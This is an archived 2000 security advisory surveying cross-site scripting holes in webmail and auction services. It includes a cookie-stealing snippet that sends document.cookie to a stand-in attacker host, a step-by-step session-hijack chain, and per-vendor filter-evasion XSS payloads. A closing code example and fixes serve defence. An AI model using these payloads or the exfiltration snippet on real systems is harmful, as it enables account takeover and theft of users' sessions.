webmail.txt

2000-08-30T00:00:00
ID PACKETSTORM:22908
Type packetstorm
Reporter D-Krypt
Modified 2000-08-30T00:00:00

Description

-Web Application Security Survey-
Results show that Microsoft Hotmail, Excite, Altavista, E-Bay, Lycos  
Netscape WebMail, E-Trade, Infoseek/Go.com and their users are all  
currently vulnerable to web based attack.  
  
[disclaimer]
The opinions, ideas and information expressed in the following text are
my own and not of any company. I shall not be held liable in any way
for the direct or indirect use or misuse of this information. This
data is for informational and security research purposes. The author
will provide no technical support for vulnerabilities stated herein.
If clarification is needed, please contact the appropriate vendor.
  
  
[intro]  
The following report is the result of a two-hour security survey of
high-profile webmail and auction services offered free over
the internet. This survey is in no way extensive or thorough.
It serves only as "proof of concept" that these types of services
are vulnerable to attack on a wide scale. All the following
vulnerabilities are currently active as of Aug. 25, 2000.

Please note that the following vulnerabilities are NOT new and have
been posted publicly for weeks if not months, either by myself or others.
  
[background and proof of concept]  
The following webmail vulnerabilities all stem from the same problem.
The attacker has the ability to pass unfiltered malicious
HTML/JavaScript into the target user's web environment. This means that
the attacker can write code and send it to the user, where it is then
executed on the client side. Whatever JavaScript can reach, the attacker
can now reach remotely as well. What sensitive things does
JavaScript (and therefore the attacker) have access to within the browser?
  
1) Browser Cookies  
2) Document Location  
3) Browser and System Settings  
4) Client Host Network Information  
  
The above are the most prominent and sensitive pieces of information
within reach.

The following vulnerabilities focus only on #1
(Browser Cookies). Most if not all webmail services use cookie data
for authentication. If the attacker were to compromise the cookie
data of the user, the account can now be accessed. Simply put, if
the attacker can pilfer the cookie data, they can substitute that
cookie into their own browser and authenticate without needing to know
a username/password. Thus the attacker has become the
target user until the session runs out. Variants may be required to
achieve maximum results. Remember, this is only proof of concept.
  
Also worth mentioning is that the attacker may use any browser-specific
vulnerabilities that require JavaScript, such as browser cache
exploits, history exploits, and others.
  
How does the attacker bypass browser cookie security to move the cookie  
data off the intended cookie domain to another? Good Question.  
  
Let's say that the attacker is able to execute arbitrary HTML/JavaScript
on the target user's machine. We now know the JavaScript has access to
the cookie strings on the domain it executes on. Using JavaScript, the
attacker can issue a "GET" request, say through the use of an "IMG" tag
or a web page request, appending the cookie string to the end of the
request.
  
<SCRIPT>  
document.sender.src = "http://www.attacker.com/evil.cgi/" +  
document.cookie;  
</SCRIPT>  
<IMG NAME=sender SRC="some_image.gif">  
  
which in essence becomes:  
<IMG NAME=sender  
SRC="http://www.attacker.com/evil.cgi/users_cookie_data">  
  
Making it even harder to detect, a 1 pixel by 1 pixel image would also
work. This can all happen quickly on the fly with JavaScript in many
varying ways.

The rest of the document relies on this principal flaw. If an attacker
can cause the user to view unrestricted arbitrary HTML/JavaScript within
their environment, the account is vulnerable. This is the general
premise.
  
To summarize, let's follow the chain of events.
1) Attacker sends a crafted HTML/JavaScript email to his target.
2) User signs into whatever service and is assigned an authentication
cookie.
3) User reads attacker's email.
4) User's cookie is secretly sent to the attacker's CGI via an invisible
GET request.
5) User continues on, never being the wiser.
6) Attacker checks his CGI logs and finds the cookie string.
7) Attacker places the victim's cookie in his/her own cookie file.
8) Attacker logs onto the service with the user's account.
  
Simple.  
  
[affected]  
The following companies were picked by no other criterion than that
they have free webmail or auction services and a large user base.
  
Microsoft Hotmail http://www.hotmail.com/  
Excite Mail http://inbox.excite.com/  
Altavista Mail http://www.altavista.com/  
E-Bay Chat Forums http://www.ebay.com/  
Lycos http://comm.lycos.com/  
Netscape WebMail http://home.netscape.com/webmail/index-f.html  
E-Trade Mail http://www.etrade.com  
Infoseek/Go.com http://register.go.com/  
  
A service not on this list is not necessarily invulnerable; it simply
hasn't been looked at.
  
[vulnerability]  
All the following vulnerabilities rely on sending HTML mail to the target
user. The following information is for example purposes only and is not a
complete account compromise (not required to demonstrate the point). All
that is shown is that the embedded JavaScript code will use an alert
dialog window to display cookie data to the user. Anything you do to go
further with the exploitation is of your own accord.
  
******EXAMPLE******  
MIME-Version: 1.0  
From: hacker <hacker@getyou.com>  
Content-Type: text/html; charset=us-ascii  
Content-Transfer-Encoding: 7bit  
Subject: The Example  
<HTML><BODY>  
  
INSERT EXPLOIT HERE  
  
</BODY></HTML>  
.  
*******************  
=======================================================================  
Microsoft Hotmail  
Vulnerable to: "HTML Entity"  
Exploit:   
  
<!-- REMOVE THE OFFENDING SLASH -->  
<IMG SRC="javas&\#09;cript:alert(document.cookie);">  
=======================================================================  
Excite Mail  
Vulnerable to: "Multi-Line Break IMG SRC JavaScript Execute"  
Exploit:   
<IMG SRC="j  
  
avascr  
  
ipt:ale  
  
rt(document.cookie);">  
=======================================================================  
Altavista  
Vulnerable to: "HTML Entity"  
Exploit:   
  
<!-- REMOVE THE OFFENDING SLASH -->  
<IMG SRC="javas&\#09;cript:alert(document.cookie);">  
=======================================================================  
E-Bay Chat Forums  
Vulnerable to: "IMG SRC JavaScript Execute"  
Exploit:   
<IMG SRC="javascript:alert(document.cookie);">  
=======================================================================  
Lycos/MailCity  
Vulnerable to: "STYLE TYPE JavaScript"  
Exploit:   
<style TYPE="text/javascript">   
alert(document.cookie);  
</style>   
=======================================================================  
Netscape WebMail (netscape.net)  
Vulnerable to: "STYLE TYPE JavaScript"  
Exploit:   
<style TYPE="text/javascript">   
alert(document.cookie);  
</style>   
=======================================================================  
E-Trade FreeMail  
Vulnerable to: "STYLE TYPE JavaScript"  
Exploit:   
<IMG SRC="livescript:alert(document.cookie);">  
  
=======================================================================  
Infoseek/Go Network Mail  
Vulnerable to: "Multi-Line Break IMG SRC JavaScript Execute"  
Exploit:   
<IMG SRC="j  
  
avascr  
  
ipt:ale  
  
rt(document.cookie);">  
=======================================================================  
  
  
[Solution]
Vendor: Filter for known JavaScript strings and disallow them from
entering the user's environment.

User: Turn off JavaScript until a fix has been implemented by the vendor.
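As an added example (not part of the advisory), the Python below shows why the vendor fix needs more than matching known strings: a literal substring filter misses every evasion variant this advisory lists, while decoding HTML entities and stripping whitespace before checking each URL attribute's scheme against an allowlist (plus rejecting STYLE elements typed as text/javascript) catches all of them and still passes a plain image reference. The sample payloads are constructed from the advisory's own variants; the attribute names and allowed schemes are assumptions for illustration.

```python
import html
import re

# Constructed samples, one per evasion variant listed in the advisory
# (tab entity, multi-line break, livescript: scheme, text/javascript STYLE),
# plus a benign image reference that a filter must let through.
SAMPLES = {
    "entity": '<IMG SRC="javas&#09;cript:alert(document.cookie);">',
    "multiline": '<IMG SRC="j\n\navascr\n\nipt:ale\n\nrt(document.cookie);">',
    "livescript": '<IMG SRC="livescript:alert(document.cookie);">',
    "style": '<style TYPE="text/javascript">alert(document.cookie);</style>',
    "benign": '<IMG SRC="http://example.org/some_image.gif">',
}

# Attributes that take a URL (assumed set), value in double, single or no quotes.
URL_ATTR_RE = re.compile(
    r'''\b(src|href|dynsrc|lowsrc)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))''', re.I)
STYLE_JS_RE = re.compile(r'''<style\b[^>]*\btype\s*=\s*["']?text/javascript''', re.I)
ALLOWED_SCHEMES = {"http", "https", "mailto"}  # assumed allowlist for mail content

def naive_filter_flags(markup: str) -> bool:
    """The 'filter known JavaScript strings' approach: literal substring match."""
    lowered = markup.lower()
    return "javascript:" in lowered or "<script" in lowered

def normalize_url(value: str) -> str:
    """Decode HTML entities, then drop the control/whitespace bytes that browsers
    of the era ignored inside a URL scheme, so 'javas\\tcript' and the
    multi-line 'j\\n\\navascr...' both collapse to 'javascript'."""
    decoded = html.unescape(value)
    return re.sub(r"[\x00-\x20]", "", decoded).lower()

def normalized_filter_flags(markup: str) -> bool:
    """Allowlist check on the normalized scheme of every URL attribute,
    plus rejection of STYLE elements declared as text/javascript."""
    if STYLE_JS_RE.search(markup):
        return True
    for m in URL_ATTR_RE.finditer(markup):
        url = normalize_url(m.group(2) or m.group(3) or m.group(4) or "")
        if ":" in url and url.split(":", 1)[0] not in ALLOWED_SCHEMES:
            return True
    return False

def compare_filters() -> dict:
    """Map each sample name to (naive_flagged, normalized_flagged)."""
    return {k: (naive_filter_flags(v), normalized_filter_flags(v))
            for k, v in SAMPLES.items()}
```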
  
  
  